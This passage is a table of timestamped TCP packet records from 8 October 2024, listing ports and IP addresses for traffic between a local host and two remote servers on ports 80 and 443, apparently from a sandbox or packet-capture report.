Oct 8, 2024 20:47:24.209759951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209769964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209775925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209779978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209790945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209800959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209804058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209815979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209821939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209826946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209837914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209846020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209847927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209860086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209871054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209887028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209906101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210103989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210114002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210123062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210151911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210175991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210211992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210221052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210236073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210246086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210253954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210258007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210269928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210284948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210297108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210306883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210308075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210315943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210323095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210325956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210336924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210359097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210381031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210917950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210952044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210961103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.210968971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210978985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.210990906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211000919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211003065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211014032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211024046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211026907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211035013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211041927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211045027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211066961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211086988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211133957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211143970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211164951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211169958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211175919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211185932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211189032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211196899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211205959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211216927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211220026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211230993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211240053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211245060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211250067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211260080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211270094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211272001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211282969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211292982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211294889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211306095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211308956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211318016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211329937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211332083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211355925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211373091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211736917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211746931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211757898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211765051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.211786985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.211810112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.261799097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.261915922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.262074947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262094021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262108088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262120008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262130976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.262134075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262145996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262155056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.262162924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262197018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.262208939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262217045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.262222052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262234926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262278080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.262300014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.262394905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262407064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262419939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262430906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.262454987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.262485027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.290143013 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.290299892 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.290411949 CEST	49782	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.290679932 CEST	49782	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.290693045 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.290738106 CEST	49782	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.290743113 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.293546915 CEST	49787	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.293586016 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.293667078 CEST	49787	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.293816090 CEST	49787	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.293833017 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.294014931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294173956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294208050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294228077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294244051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294269085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294276953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294295073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294321060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294337034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294383049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294390917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294424057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294435978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294456959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294467926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294491053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294503927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294523954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294537067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294557095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294573069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294591904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294604063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294629097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.294639111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.294676065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295557022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295613050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295648098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295675993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295703888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295708895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295737028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295749903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295775890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295784950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295810938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295820951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295860052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295869112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295902967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295913935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295941114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.295975924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295988083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.295994043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296026945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296042919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296060085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296093941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296098948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296111107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296125889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296159983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296161890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296176910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296195984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296221018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296230078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296247005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296263933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296281099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296300888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296335936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296344995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296353102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296386003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296422005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296477079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296483040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296515942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296531916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296550035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296564102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296581030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296612978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296627045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296648026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296660900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296704054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296739101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296766996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296801090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296812057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296834946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296845913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296865940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296883106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296900034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296909094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296932936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.296957970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.296967983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297000885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297019005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297034025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297046900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297068119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297089100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297132015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297153950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297164917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297195911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297200918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297204971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297235012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297254086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297269106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297282934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297302008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297317028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297333956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297367096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297368050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297379017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297400951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297434092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297447920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297478914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297494888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297533035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297548056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297564983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297583103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297597885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297611952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297631025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297643900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297663927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297681093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297698021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297709942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297733068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297745943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297764063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297776937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297800064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297810078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297854900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.297945023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297977924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.297993898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298012018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298023939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298046112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298058987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298080921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298096895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298115015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298126936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298147917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298161030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298182011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298194885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298216105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298228025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298249960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298263073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298283100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298288107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298315048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298331976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298347950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298363924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298382998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298393011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298415899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298429966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298451900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298463106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298480988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298504114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298527002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298551083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298583984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298599958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298615932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298630953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298650980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298665047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298685074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298701048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298717022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298727989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298749924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298763037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298783064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298804998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298818111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298834085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298854113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298866034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298887968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.298902035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.298935890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.348875046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.348922968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.348933935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349036932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.349056959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349067926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349077940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349103928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.349127054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.349255085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349266052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349275112 CEST	80	49755	95.164.90.97	192.168.2.5
